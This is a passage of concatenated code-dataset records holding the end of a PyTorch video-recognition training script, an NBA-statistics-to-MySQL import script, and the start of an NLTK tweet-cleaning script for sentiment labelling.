verb_top1.update(verb_prec1.item(), batchsize)\n verb_top5.update(verb_prec5.item(), batchsize)\n noun_top1.update(noun_prec1.item(), batchsize)\n noun_top5.update(noun_prec5.item(), batchsize)\n\n if args.ada_reso_skip:\n # gather masks\n for layer_i, mask_stack in enumerate(mask_stack_list):\n if \"batenet\" in args.arch:\n mask_stack_list_list[layer_i] += torch.sum(mask_stack.detach(), dim=0) # TODO remvoed .cpu()\n elif \"AdaBNInc\" in args.arch:\n mask_stack_list_list[layer_i] += torch.sum(mask_stack.detach(), dim=0) # TODO remvoed .cpu()\n else: # TODO CGNet\n mask_stack_list_list[layer_i].append(mask_stack.detach()) #TODO remvoed .cpu()\n\n if args.save_meta_gate:\n gate_meta_list.append(gate_meta.cpu())\n # mask_stat=[]\n # for layer_i, mask_stack in enumerate(mask_stack_list):\n # mask_stat.append(torch.sum(mask_stack.cpu(), dim=2)) # TODO: N*T*C*3 -> N*T*3\n # mask_stat = torch.stack(mask_stat, dim=2) # TODO L, N*T*3->N*T*L*3\n # mask_stat_list.append(mask_stat)\n for layer_i, mask_stack in enumerate(mask_stack_list):\n mask_stat_list[layer_i].append(torch.max(mask_stack.cpu(), dim=-1)[1]) # TODO: L, N*T*C*3\n\n # measure elapsed time\n batch_time.update(time.time() - end)\n end = time.time()\n\n if args.rank == 0 and i % args.print_freq == 0:\n print_output = ('Test: [{0:03d}/{1:03d}] '\n 'Time {batch_time.val:.3f}({batch_time.avg:.3f})\\t'\n 'Loss{loss.val:.4f}({loss.avg:.4f})'\n 'Prec@1 {top1.val:.3f}({top1.avg:.3f}) '\n 'Prec@5 {top5.val:.3f}({top5.avg:.3f})\\t'.\n format(i, len(val_loader), batch_time=batch_time,\n loss=losses_dict[\"loss\"], top1=top1, top5=top5))\n if args.dataset == \"epic\":\n print_output += \"V@1 {v1.val:.3f}({v1.avg:.3f}) V@5 {v5.val:.3f}({v5.avg:.3f}) \" \\\n \"N@1 {n1.val:.3f}({n1.avg:.3f}) N@5 {n5.val:.3f}({n5.avg:.3f}) \". \\\n format(v1=verb_top1, v5=verb_top5, n1=noun_top1, n5=noun_top5)\n\n for loss_name in losses_dict:\n if loss_name == \"loss\" or \"mask\" in loss_name:\n continue\n print_output += ' {header:s} {loss.val:.3f}({loss.avg:.3f})'. \\\n format(header=loss_name[0], loss=losses_dict[loss_name])\n print(print_output)\n if args.ada_reso_skip:\n if \"cgnet\" in args.arch:\n for layer_i in range(len(mask_stack_list_list)):\n mask_stack_list_list[layer_i] = torch.cat(mask_stack_list_list[layer_i], dim=0)\n # upb_batch_gflops, real_batch_gflops = compute_gflops_by_mask(mask_stack_list_list, base_model_gflops, gflops_list, args)\n upb_batch_gflops = torch.mean(torch.stack(upb_batch_gflops_list))\n real_batch_gflops = torch.mean(torch.stack(real_batch_gflops_list))\n\n mAP, _ = cal_map(torch.cat(all_results, 0).cpu(),\n torch.cat(all_targets, 0)[:, 0:1].cpu()) # TODO(yue) single-label mAP\n mmAP, _ = cal_map(torch.cat(all_results, 0).cpu(), torch.cat(all_targets, 0).cpu()) # TODO(yue) multi-label mAP\n\n\n if dist.is_initialized():\n mAP_tensor = torch.tensor(mAP).to(all_results[0].device)\n mmAP_tensor = torch.tensor(mmAP).to(all_results[0].device)\n\n world_size = dist.get_world_size()\n if args.ada_reso_skip:\n dist.all_reduce(upb_batch_gflops)\n dist.all_reduce(real_batch_gflops)\n dist.all_reduce(mAP_tensor)\n dist.all_reduce(mmAP_tensor)\n if args.ada_reso_skip:\n upb_batch_gflops /= world_size\n real_batch_gflops /= world_size\n mAP_tensor /= world_size\n mmAP_tensor /= world_size\n mAP = mAP_tensor.item()\n mmAP = mmAP_tensor.item()\n\n if args.rank==0:\n epic_str=\"\"\n if args.dataset==\"epic\":\n epic_str = \"V@1: %.3f V@5: %.3f N@1: %.3f N@5: %.3f\" % (verb_top1.avg, verb_top5.avg, noun_top1.avg, noun_top5.avg)\n\n print('Testing: mAP {mAP:.3f} mmAP {mmAP:.3f} Prec@1 {top1.avg:.3f} Prec@5 {top5.avg:.3f} {epic_str:s} Loss {loss.avg:.5f}'\n .format(mAP=mAP, mmAP=mmAP, top1=top1, top5=top5, loss=losses_dict[\"loss\"],\n epic_str=epic_str))\n if args.ada_reso_skip:\n usage_str = get_policy_usage_str(upb_batch_gflops, real_batch_gflops)\n print(usage_str)\n # if args.print_statistics:\n print_mask_statistics(mask_stack_list_list, args)\n else:\n usage_str = \"Base Model\"\n\n if args.save_meta_gate:\n # TODO all_targets, all_preds, all_mask_stats\n # all_mask_stats = torch.cat(mask_stat_list, dim=0)\n all_preds = torch.cat(gate_meta_list, dim=0)\n\n for layer_i in range(len(mask_stack_list)):\n mask_stat_list[layer_i] = torch.cat(mask_stat_list[layer_i], dim=0) # TODO: L, N*T*C\n mask_stat_list[layer_i] = mask_stat_list[layer_i].numpy().astype(np.uint8)\n # for layer_i in range(len(mask_stack_list)):\n # print(mask_stat_list[layer_i].shape)\n\n # np.savez(\"%s/meta-gate-val.npy\" % (exp_full_path),\n # preds=all_preds.numpy(), targets=torch.cat(all_targets, 0).cpu().numpy(),\n # record_path=torch.cat(record_path_list, 0).cpu().numpy(),\n # indices_list=torch.cat(indices_list, 0).cpu().numpy())\n # else:\n np.savez(\"%s/meta-gate-val.npy\" % (exp_full_path),\n preds=all_preds.numpy(), targets=torch.cat(all_targets, 0).cpu().numpy())\n with open(\"%s/gate-stat-val.pkl\" % (exp_full_path), 'wb') as outfile:\n pickle.dump(mask_stat_list, outfile, pickle.HIGHEST_PROTOCOL)\n if args.save_meta:\n with open(\"%s/record-path-val.pkl\" % (exp_full_path), 'wb') as outfile:\n pickle.dump(record_path_list, outfile, pickle.HIGHEST_PROTOCOL)\n\n with open(\"%s/indices-val.pkl\" % (exp_full_path), 'wb') as outfile:\n pickle.dump(torch.stack(indices_list,0).cpu().numpy(), outfile, pickle.HIGHEST_PROTOCOL)\n\n if tf_writer is not None:\n tf_writer.add_scalar('loss/test', losses_dict[\"loss\"].avg, epoch)\n tf_writer.add_scalar('acc/test_top1', top1.avg, epoch)\n tf_writer.add_scalar('acc/test_top5', top5.avg, epoch)\n else:\n usage_str = \"Empty: non-master node\"\n if args.dataset==\"epic\":\n return mAP, mmAP, top1.avg, top5.avg, usage_str, (verb_top1.avg, verb_top5.avg, noun_top1.avg, noun_top5.avg)\n else:\n return mAP, mmAP, top1.avg, top5.avg, usage_str, None\n\n\ndef save_checkpoint(state, is_best, shall_backup, exp_full_path, decorator):\n if is_best:\n torch.save(state, '%s/models/%s.pth.tar' % (exp_full_path, decorator))\n if shall_backup:\n copyfile(\"%s/models/ckpt.best.pth.tar\"%exp_full_path,\n \"%s/models/oldbest.%s.pth.tar\"%(exp_full_path, decorator))\n\n\ndef adjust_learning_rate(optimizer, epoch, length, iteration, lr_type, lr_steps, args):\n if lr_type == 'step':\n decay = 0.1 ** (sum(epoch >= np.array(lr_steps)))\n lr = args.lr * decay\n decay = args.weight_decay\n elif lr_type == 'cos':\n import math\n lr = 0.5 * args.lr * (1 + math.cos(math.pi * epoch / args.epochs))\n decay = args.weight_decay\n elif lr_type == 'linear':\n factor = min(1.0, (epoch * length + iteration + 1)/(args.warmup_epochs * length))\n lr = args.lr * factor\n else:\n raise NotImplementedError\n for param_group in optimizer.param_groups:\n param_group['lr'] = lr * param_group['lr_mult']\n if lr_type != 'linear':\n param_group['weight_decay'] = decay * param_group['decay_mult']\n\n\ndef setup_log_directory(exp_header, test_mode, args, logger):\n exp_full_name = \"g%s_%s\" % (logger._timestr, exp_header)\n if test_mode:\n exp_full_path = ospj(common.EXPS_PATH, args.test_from)\n else:\n exp_full_path = ospj(common.EXPS_PATH, exp_full_name)\n if args.rank == 0:\n os.makedirs(exp_full_path)\n os.makedirs(ospj(exp_full_path, \"models\"))\n if args.rank == 0:\n logger.create_log(exp_full_path, test_mode, args.num_segments, args.batch_size, args.top_k)\n return exp_full_path\n\ndef build_dataflow(dataset, is_train, batch_size, workers, is_distributed, not_pin_memory):\n workers = min(workers, multiprocessing.cpu_count())\n sampler = torch.utils.data.distributed.DistributedSampler(dataset) if is_distributed else None\n shuffle = False\n if is_train:\n shuffle = sampler is None\n\n data_loader = torch.utils.data.DataLoader(dataset, batch_size=batch_size, shuffle=shuffle,\n num_workers=workers, pin_memory=not not_pin_memory, sampler=sampler,\n drop_last=is_train)\n return data_loader\n\n\ndef get_data_loaders(model, prefix, args):\n if args.rank == 0:\n print(\"data_path : %s\" % args.root_path)\n print(\"train_list: %s\" % args.train_list)\n print(\"val_list : %s\" % args.val_list)\n print(\"%s: %d classes\" % (args.dataset, args.num_class))\n\n # train_augmentation = model.module.get_augmentation(\n # flip=False if 'something' in args.dataset or 'jester' in args.dataset else True)\n\n train_transform_flip = torchvision.transforms.Compose([\n model.module.get_augmentation(flip=True),\n Stack(roll=(\"BNInc\" in args.arch)),\n ToTorchFormatTensor(div=(\"BNInc\" not in args.arch)),\n GroupNormalize(model.module.input_mean, model.module.input_std),\n ])\n\n train_transform_nofl = torchvision.transforms.Compose([\n model.module.get_augmentation(flip=False),\n Stack(roll=(\"BNInc\" in args.arch)),\n ToTorchFormatTensor(div=(\"BNInc\" not in args.arch)),\n GroupNormalize(model.module.input_mean, model.module.input_std),\n ])\n\n val_transform = torchvision.transforms.Compose([\n GroupScale(int(model.module.scale_size)),\n GroupCenterCrop(model.module.crop_size),\n Stack(roll=(\"BNInc\" in args.arch)),\n ToTorchFormatTensor(div=(\"BNInc\" not in args.arch)),\n GroupNormalize(model.module.input_mean, model.module.input_std),\n ])\n\n train_dataset = TSNDataSet(args.root_path, args.train_list,\n num_segments=args.num_segments,\n image_tmpl=prefix,\n transform=(train_transform_flip, train_transform_nofl),\n dense_sample=args.dense_sample,\n dataset=args.dataset,\n filelist_suffix=args.filelist_suffix,\n folder_suffix=args.folder_suffix,\n save_meta=args.save_meta,\n always_flip=args.always_flip,\n conditional_flip=args.conditional_flip,\n adaptive_flip=args.adaptive_flip,\n rank=args.rank)\n\n val_dataset = TSNDataSet(args.root_path, args.val_list,\n num_segments=args.num_segments,\n image_tmpl=prefix,\n random_shift=False,\n transform=(val_transform, val_transform),\n dense_sample=args.dense_sample,\n dataset=args.dataset,\n filelist_suffix=args.filelist_suffix,\n folder_suffix=args.folder_suffix,\n save_meta=args.save_meta,\n rank=args.rank)\n\n train_loader = build_dataflow(train_dataset, True, args.batch_size, args.workers, args.distributed, args.not_pin_memory)\n val_loader = build_dataflow(val_dataset, False, args.batch_size, args.workers, args.distributed, args.not_pin_memory)\n\n if args.dataset == \"epic\":\n train_loader.a_v_m = train_dataset.a_v_m\n train_loader.a_n_m = train_dataset.a_n_m\n val_loader.a_v_m = val_dataset.a_v_m\n val_loader.a_n_m = val_dataset.a_n_m\n else:\n train_loader.a_v_m = None\n train_loader.a_n_m = None\n val_loader.a_v_m = None\n val_loader.a_n_m = None\n\n return train_loader, val_loader\n\ndef take_care_of_pretraining(sd, args):\n old_to_new_pairs = []\n if args.downsample0_renaming:\n for k in sd:\n if \"downsample0\" in k:\n old_to_new_pairs.append((k, k.replace(\"downsample0\", \"downsample.0\")))\n elif \"downsample1\" in k:\n old_to_new_pairs.append((k, k.replace(\"downsample1\", \"downsample.1\")))\n\n if args.downsample_0_renaming or (any([args.use_segk8, args.use_tsmk8, args.use_tsmk8]) and args.ada_reso_skip):\n for k in sd:\n if \"downsample.0\" in k:\n old_to_new_pairs.append((k, k.replace(\"downsample.0\", \"downsample0\")))\n elif \"downsample.1\" in k:\n old_to_new_pairs.append((k, k.replace(\"downsample.1\", \"downsample1\")))\n\n for old_key, new_key in old_to_new_pairs:\n sd[new_key] = sd.pop(old_key)\n old_to_new_pairs = []\n\n for old_key, new_key in old_to_new_pairs:\n sd[new_key] = sd.pop(old_key)\n\n old_to_new_pairs = []\n if args.shift and args.ada_reso_skip:\n for k in sd:\n if \"conv1.net.\" in k:\n old_to_new_pairs.append((k, k.replace(\"conv1.net.\", \"conv1.\")))\n for old_key, new_key in old_to_new_pairs:\n sd[new_key] = sd.pop(old_key)\n\n del_keys = []\n if args.ignore_new_fc_weight or any([args.use_segk8, args.use_tsmk8, args.use_tsmk8]):\n del_keys += [k for k in sd if \"module.new_fc\" in k]\n for k in del_keys:\n del sd[k]\n\n del_keys = []\n if args.ignore_loading_gate_fc:\n del_keys += [k for k in sd if \"gate_fc\" in k]\n for k in del_keys:\n del sd[k]\n return sd\n\ndef handle_frozen_things_in(model, args):\n # TODO(yue) freeze some params in the policy + lstm layers\n if args.freeze_policy:\n for name, param in model.module.named_parameters():\n if \"lite_fc\" in name or \"lite_backbone\" in name or \"rnn\" in name or \"linear\" in name:\n param.requires_grad = False\n\n if args.freeze_backbone:\n for name, param in model.module.named_parameters():\n if \"base_model\" in name:\n param.requires_grad = False\n if len(args.frozen_list) > 0:\n for name, param in model.module.named_parameters():\n for keyword in args.frozen_list:\n if keyword[0] == \"J\":\n if keyword[-1] == \"J\": # TODO middle\n if keyword[1:-1] in name:\n param.requires_grad = False\n if args.rank==0:\n print(keyword, \"->\", name, \"frozen\")\n else: # TODO suffix\n if name.endswith(keyword[1:]):\n param.requires_grad = False\n if args.rank == 0:\n print(keyword, \"->\", name, \"frozen\")\n elif keyword[-1] == \"J\": # TODO prefix\n if name.startswith(keyword[:-1]):\n param.requires_grad = False\n if args.rank == 0:\n print(keyword, \"->\", name, \"frozen\")\n else: # TODO exact word\n if name == keyword:\n param.requires_grad = False\n if args.rank == 0:\n print(keyword, \"->\", name, \"frozen\")\n if args.rank == 0:\n print(\"=\" * 80)\n for name, param in model.module.named_parameters():\n print(param.requires_grad, \"\\t\", name)\n\n if len(args.frozen_layers) > 0:\n for layer_idx in args.frozen_layers:\n for name, param in model.module.named_parameters():\n if layer_idx == 0:\n if \"list.0.conv1\" in name:\n param.requires_grad = False\n if args.rank == 0:\n print(layer_idx, \"->\", name, \"frozen\")\n else:\n if \"list.0.layer%d\" % layer_idx in name and (\"conv\" in name or \"downsample.0\" in name):\n param.requires_grad = False\n if args.rank == 0:\n print(layer_idx, \"->\", name, \"frozen\")\n if args.freeze_corr_bn:\n for km in model.named_modules():\n k, m = km\n if layer_idx == 0:\n if \"bn1\" in k and \"layer\" not in k and isinstance(m, nn.BatchNorm2d): # TODO(yue)\n m.eval()\n m.weight.requires_grad = False\n m.bias.requires_grad = False\n if args.rank == 0:\n print(layer_idx, \"->\", k, \"frozen batchnorm\")\n else:\n if \"layer%d\" % (layer_idx) in k and isinstance(m, nn.BatchNorm2d): # TODO(yue)\n m.eval()\n m.weight.requires_grad = False\n m.bias.requires_grad = False\n if args.rank == 0:\n print(layer_idx, \"->\", k, \"frozen batchnorm\")\n if args.rank == 0:\n print(\"=\" * 80)\n for name, param in model.module.named_parameters():\n print(param.requires_grad, \"\\t\", name)\n\n\nif __name__ == '__main__':\n t0 = time.time()\n main()\n print(\"Finished in %.4f seconds\\n\" % (time.time() - t0))\n","repo_name":"mengyuest/temporal-shift-module","sub_path":"main_gate.py","file_name":"main_gate.py","file_ext":"py","file_size_in_byte":64242,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"42915297291","text":"import time\nimport pandas as pd\nimport pymysql\nfrom nba_api.stats.endpoints import commonplayerinfo, PlayerGameLog\nfrom nba_api.stats.endpoints import leaguegamefinder\nfrom nba_api.stats.library.parameters import SeasonTypeAllStar\nfrom nba_api.stats.static.players import *\nfrom nba_api.stats.static.teams import *\n\n\n# create player\ndef import_players(cursor):\n \"\"\"\n Pulls from NBA API to update players\n :param cursor:\n :return:\n \"\"\"\n # Find all player_ids from players table\n print(\"Updating Players from API...\")\n cursor.callproc('get_players')\n existing_player_ids = cursor.fetchall()\n existing_player_ids = [player['player_id'] for player in existing_player_ids]\n\n # Get all active players from nba_api\n player_info = get_active_players()\n players_added = 0\n for player in player_info:\n if player['id'] not in existing_player_ids:\n try:\n players_added += 1\n playerCommonInfo = commonplayerinfo.CommonPlayerInfo(player['id'])\n player_api = playerCommonInfo.get_dict()\n keys = player_api['resultSets'][0]['headers']\n values = player_api['resultSets'][0]['rowSet'][0]\n if len(keys) != len(values):\n players_added -= 1\n continue\n player_dict = dict(zip(keys, values))\n if player_dict['DRAFT_ROUND'] == 'Undrafted':\n players_added -= 1\n continue\n\n if len(player_dict['JERSEY']) > 2:\n player_dict.update({'JERSEY': re.split(r'\\D', player_dict['JERSEY'])[-1]})\n\n if player_dict['JERSEY'] == '':\n player_dict.update({'JERSEY': None})\n\n if player_dict['HEIGHT'] == '':\n player_dict.update({'HEIGHT': None})\n\n if player_dict['HEIGHT'] is not None:\n feet, inches = player_dict['HEIGHT'].split('-')\n player_dict.update({'HEIGHT': float(feet) + (float(inches) / 100)})\n\n if player_dict['POSITION'] == '' or player_dict['POSITION'] is None:\n player_dict.update({'POSITION': 'Unknown'})\n else:\n cursor.callproc('get_positions')\n existing_positions = cursor.fetchall()\n existing_positions = [position['position_name'] for position in\n existing_positions]\n if player_dict['POSITION'] not in existing_positions:\n cursor.callproc('create_position',\n (player_dict['POSITION'],))\n else:\n player_dict.update(\n {'POSITION': existing_positions.index(player_dict['POSITION'])})\n cursor.callproc('create_player_api',\n (player_dict['PERSON_ID'],\n player_dict['FIRST_NAME'],\n player_dict['LAST_NAME'],\n player_dict['BIRTHDATE'],\n player_dict['HEIGHT'],\n player_dict['POSITION'],\n player_dict['JERSEY'],\n True if player_dict['ROSTERSTATUS'] == 'Active' else False,\n player_dict['SEASON_EXP'],\n player_dict['TEAM_ID'],\n player_dict['TO_YEAR']))\n time.sleep(1)\n print(\"Creating player: %s on the %s\" % (\n player_dict['DISPLAY_FIRST_LAST'], player_dict['TEAM_NAME']))\n except pymysql.Error as e:\n print(\"Error %d: %s\" % (e.args[0], e.args[1]))\n players_added -= 1\n continue\n return print(\"Added %s players to the database.\" % players_added)\n\n\ndef import_teams(cursor):\n \"\"\"\n Pulls from NBA API to update teams\n :param cursor:\n :return:\n \"\"\"\n print(\"Updating Teams from API...\")\n cursor.callproc('get_teams')\n existing_team_ids = cursor.fetchall()\n existing_team_ids = [team['team_id'] for team in existing_team_ids]\n\n team_info = get_teams()\n teams_added = 0\n for team in team_info:\n if team['id'] not in existing_team_ids:\n try:\n teams_added += 1\n print(\"Created team: %s (%s)\" % (team['full_name'],\n team['id']))\n cursor.callproc('create_team',\n (team['full_name'],\n team['abbreviation'],\n team['nickname'],\n team['city'],\n team['state'],\n team['year_founded']))\n except pymysql.Error as e:\n print(\"Error %d: %s\" % (e.args[0], e.args[1]))\n teams_added -= 1\n continue\n\n return print(\"Added %s teams to the database.\" % teams_added)\n\n\ndef combine_team_games(df, keep_method='home'):\n \"\"\"Combine a TEAM_ID-GAME_ID unique table into rows by game. Slow.\n\n Parameters\n ----------\n df : Input DataFrame.\n keep_method : {'home', 'away', 'winner', 'loser', ``None``}, default 'home'\n - 'home' : Keep rows where TEAM_A is the home team.\n - 'away' : Keep rows where TEAM_A is the away team.\n - 'winner' : Keep rows where TEAM_A is the losing team.\n - 'loser' : Keep rows where TEAM_A is the winning team.\n - ``None`` : Keep all rows. Will result in an output DataFrame the same\n length as the input DataFrame.\n\n Returns\n -------\n result : DataFrame\n \"\"\"\n # Join every row to all others with the same game ID.\n joined = pd.merge(df, df, suffixes=['_A', '_B'],\n on=['SEASON_ID', 'GAME_ID', 'GAME_DATE'])\n # Filter out any row that is joined to itself.\n result = joined[joined.TEAM_ID_A != joined.TEAM_ID_B]\n # Take action based on the keep_method flag.\n if keep_method is None:\n # Return all the rows.\n pass\n elif keep_method.lower() == 'home':\n # Keep rows where TEAM_A is the home team.\n result = result[result.MATCHUP_A.str.contains(' vs. ')]\n elif keep_method.lower() == 'away':\n # Keep rows where TEAM_A is the away team.\n result = result[result.MATCHUP_A.str.contains(' @ ')]\n elif keep_method.lower() == 'winner':\n result = result[result.WL_A == 'W']\n elif keep_method.lower() == 'loser':\n result = result[result.WL_A == 'L']\n else:\n raise ValueError(f'Invalid keep_method: {keep_method}')\n return result\n\n\ndef import_games(cursor, season):\n \"\"\"\n Pulls from NBA API to update games\n :param cursor:\n :param season:\n :return:\n \"\"\"\n # Get list of existing game IDs\n cursor.callproc('get_games')\n existing_game_ids = cursor.fetchall()\n existing_game_ids = [game['game_id'] for game in existing_game_ids]\n\n # Create list of new game IDs\n new_game_ids = []\n\n # Get list of teams\n cursor.callproc('get_teams')\n team_results = cursor.fetchall()\n team_results.pop(0)\n for team in team_results:\n print(\"Checking for new games for %s in %s Season\" % (team['team_name'], season))\n for season_type in [SeasonTypeAllStar.regular, SeasonTypeAllStar.playoffs]:\n time.sleep(1)\n game_finder = leaguegamefinder.LeagueGameFinder(team_id_nullable=team['team_id'],\n season_nullable=season,\n season_type_nullable=season_type)\n games = game_finder.get_dict()\n\n keys = games['resultSets'][0]['headers']\n values = games['resultSets'][0]['rowSet']\n for value in values:\n if len(value) == len(keys):\n game_dict = dict(zip(keys, value))\n game_id = int(game_dict['GAME_ID'])\n if game_id not in existing_game_ids and game_id not in new_game_ids:\n print(\"Found new game: %s\" % game_dict['GAME_ID'])\n new_game_ids.append(game_dict['GAME_ID'])\n\n if len(new_game_ids) == 0:\n return print(\"No new games found for %s Season\" % season)\n else:\n games_added = 0\n for season_type in [SeasonTypeAllStar.regular, SeasonTypeAllStar.playoffs]:\n result = leaguegamefinder.LeagueGameFinder(season_nullable=season,\n season_type_nullable=season_type)\n all_games = result.get_data_frames()[0]\n for game in new_game_ids:\n try:\n full_game = all_games[all_games['GAME_ID'] == game]\n game_df = combine_team_games(full_game)\n if not game_df['WL_A'].empty and not game_df['WL_B'].empty:\n if game_df['WL_A'].iloc[0] == 'W':\n game_df['WINNER'] = game_df['TEAM_ID_A']\n elif game_df['WL_B'].iloc[0] == 'W':\n game_df['WINNER'] = game_df['TEAM_ID_B']\n else:\n game_df['WINNER'] = None\n GAME_ID = game_df['GAME_ID'].iloc[0]\n DATE = game_df['GAME_DATE'].iloc[0]\n TEAM_ID_A = game_df['TEAM_ID_A'].iloc[0]\n TEAM_ID_B = game_df['TEAM_ID_B'].iloc[0]\n PTS_A = game_df['PTS_A'].iloc[0]\n PTS_B = game_df['PTS_B'].iloc[0]\n WINNER = game_df['WINNER'].iloc[0]\n\n cursor.callproc('create_game_api',\n (GAME_ID,\n TEAM_ID_A,\n TEAM_ID_B,\n PTS_A,\n PTS_B,\n DATE,\n WINNER))\n print(\"Created game with game id %s\" % GAME_ID)\n games_added += 1\n except pymysql.Error as e:\n print(\"Error %d: %s\" % (e.args[0], e.args[1]))\n\n return print(\"Created %s new games\" % games_added)\n\n\ndef import_player_stats(cursor, season):\n \"\"\"\n Imports player stats for a given season\n :param cursor:\n :param season:\n :return:\n \"\"\"\n cursor.callproc('get_players')\n all_players = cursor.fetchall()\n all_players = [player for player in all_players if player['is_active'] == 1]\n player_stats_added = 0\n for player in all_players:\n print(\"Checking stats for: %s %s (%s)\" % (player['first_name'],\n player['last_name'],\n player['player_id']))\n for season_type in [SeasonTypeAllStar.regular, SeasonTypeAllStar.playoffs]:\n # Gets the game log for each season\n player_game_log = PlayerGameLog(player_id=player['player_id'],\n season=season,\n season_type_all_star=season_type).get_data_frames()[0]\n for i in range(len(player_game_log)):\n cursor.callproc('get_stat',\n (player['player_id'], player_game_log['Game_ID'].iloc[i]))\n stat = cursor.fetchone()\n if stat is None:\n game_id = player_game_log['Game_ID'].iloc[i]\n points = player_game_log['PTS'].iloc[i]\n assists = player_game_log['AST'].iloc[i]\n rebounds = player_game_log['REB'].iloc[i]\n steals = player_game_log['STL'].iloc[i]\n blocks = player_game_log['BLK'].iloc[i]\n turnovers = player_game_log['TOV'].iloc[i]\n fouls = player_game_log['PF'].iloc[i]\n minutes_played = player_game_log['MIN'].iloc[i]\n\n try:\n cursor.callproc('create_player_game_stats',\n (player['player_id'],\n game_id,\n points,\n assists,\n rebounds,\n steals,\n blocks,\n turnovers,\n fouls,\n minutes_played))\n except pymysql.Error as e:\n print(\"Error %d: %s\" % (e.args[0], e.args[1]))\n continue\n print(\"Updated player stats for %s %s (%s)\" % (player['first_name'],\n player['last_name'],\n player['player_id']))\n player_stats_added += 1\n time.sleep(0.25)\n\n return print(\"Updated stats for %s players\" % player_stats_added)\n","repo_name":"Romangino/CS5200-final-project","sub_path":"data_setup/import_data.py","file_name":"import_data.py","file_ext":"py","file_size_in_byte":13557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12699762176","text":"import os\nimport csv as csv\nfrom nltk.tag import pos_tag\nfrom nltk.stem.wordnet import WordNetLemmatizer\nimport re, string\nfrom nltk.corpus import stopwords\nfrom nltk.tag import (pos_tag)\nimport jsonlines\nfrom datetime import datetime\nfrom nltk.tokenize import word_tokenize\nfrom nltk.corpus import twitter_samples\nimport io\nimport json\n\nstoplist = set(stopwords.words('english'))\nfiles_location = 'C:\\\\Users\\\\Sydney\\\\Documents\\\\College\\\\IndependentStudy'\nneg_data_list = []\npos_data_list = []\nunlabeled_data_list = []\n\npositive_cleaned_tokens = []\nnegative_cleaned_tokens = []\nneutral_cleaned_tokens = []\nunlabeled_cleaned_tokens = []\n\n\ndef extract_data(location):\n output_file = location + \"\\\\unlabeled_US_data.csv\"\n input_file = location + \"\\\\hydrated_compiled_data.jsonl\"\n if not os.path.exists(input_file):\n print(\"uh oh better fix that\")\n if os.path.exists(output_file):\n os.remove(output_file)\n\n with open(output_file, 'w+', newline='', encoding=\"utf8\") as writefile:\n with jsonlines.open(input_file) as readfile:\n w = csv.writer(writefile)\n r = jsonlines.Reader(input_file)\n for row in readfile:\n obj = []\n if row['place'] is not None and row['place']['country_code'] == 'US':\n orig_timedate = row['created_at']\n date_obj = datetime.strptime(orig_timedate, \"%a %b %d %H:%M:%S %z %Y\")\n obj.append(date_obj)\n obj.append(row['id'])\n obj.append(row['place']['country_code'])\n obj.append(row['full_text'])\n w.writerow(obj)\n\n\ndef count_labeled_data(location):\n neutral = 0\n positive = 0\n negative = 0\n\n with open(location, 'r', newline='', encoding='utf8') as readfile:\n r = csv.reader(readfile, delimiter=',')\n for row in r:\n if row[4] == \"1\":\n positive = positive + 1\n elif row[4] == \"0\":\n neutral = neutral + 1\n elif row[4] == \"-1\":\n negative = negative + 1\n print(\"Positive: \" + str(positive))\n print(\"Neutral: \" + str(neutral))\n print(\"Negative: \" + str(negative))\n print(\"Total: \" + str(negative + neutral + positive))\n\n\ndef make_json_file(folder_location):\n csv_file = folder_location + \"\\\\all_labeled_data.csv\"\n pos_file = folder_location + \"\\\\positive_data.json\"\n neg_file = folder_location + \"\\\\negative_data.json\"\n unlabeled_file = folder_location + \"\\\\unlabeled_data.json\"\n\n with open(pos_file, 'w+', newline='', encoding=\"utf8\") as pos_data, \\\n open(neg_file, 'w+', newline='', encoding=\"utf8\") as neg_data, \\\n open(unlabeled_file, 'w+', newline='', encoding=\"utf8\") as unlabeled_data:\n\n with open(csv_file, 'r', newline='', encoding='utf-8') as readfile:\n fieldnames = (\"date\", \"tweet_id\", \"country_code\", \"text\", \"label\")\n reader = csv.DictReader(readfile, fieldnames)\n for row in reader:\n initial_clean_tweet = clean_tweet(row['text'])\n if row['label'] == \"-1\":\n if not initial_clean_tweet.isspace():\n tokens = lemm_data(word_tokenize(initial_clean_tweet), stoplist)\n if len(tokens) > 0:\n negative_cleaned_tokens.append(tokens)\n\n elif row['label'] == \"1\":\n if not initial_clean_tweet.isspace():\n tokens = lemm_data(word_tokenize(initial_clean_tweet), stoplist)\n if len(tokens) > 0:\n positive_cleaned_tokens.append(tokens)\n\n elif row['label'] == \"0\":\n if not initial_clean_tweet.isspace():\n tokens = lemm_data(word_tokenize(initial_clean_tweet), stoplist)\n if len(tokens) > 0:\n neutral_cleaned_tokens.append(tokens)\n\n else:\n if not initial_clean_tweet.isspace():\n # unlabeled_data_list.append(word_tokenize(initial_clean_tweet))\n unlabeled_cleaned_tokens.append(lemm_data(word_tokenize(initial_clean_tweet), stoplist))\n # json.dump(row, unlabeled_data)\n\n # normalize/lemmatize tokens\n # for tweet in neg_data_list:\n # negative_cleaned_tokens.append(lemm_data(tweet, stoplist))\n # for tweet in pos_data_list:\n # positive_cleaned_tokens.append(lemm_data(tweet, stoplist))\n # for tweet in unlabeled_data_list:\n # unlabeled_cleaned_tokens.append(lemm_data(tweet, stoplist))\n\n return negative_cleaned_tokens, positive_cleaned_tokens, neutral_cleaned_tokens, unlabeled_cleaned_tokens\n\n\ndef clean_tweet(data):\n location = 0\n while True:\n location = data.find('@', location + 1)\n location = int(location)\n if location == -1:\n break\n elif location < len(data):\n if data[location + 1] == ' ':\n data = data[: location]\n break\n else:\n space_location = data.find(' ')\n data = data[location: space_location]\n\n # Remove URL's\n data = re.sub('http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\\(\\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+', '', data)\n # Remove numbers\n data = re.sub(r'[0-9]', '', data)\n # Remove unknown symbols (like emojis)\n data = re.sub(r'[^\\x00-\\x7f]', '', data)\n # Remove Emails\n data = re.sub(r'\\S*@\\S*\\s?', '', data)\n # Remove new line characters\n data = re.sub(r'\\s+', ' ', data)\n\n data = re.sub('((\\d+)[\\.])(?!([\\d]+))', '\\g<2>', data)\n\n data = re.sub('[/_-]', '', data)\n\n return data.lower()\n\n\ndef lemm_data(tweet_tokens, stop_words=()):\n cleaned_tokens = []\n for token, tag in pos_tag(tweet_tokens):\n if tag.startswith(\"NN\"):\n pos = 'n'\n elif tag.startswith('VB'):\n pos = 'v'\n else:\n pos = 'a'\n\n if token == \"'s\":\n token = \"is\"\n elif token == 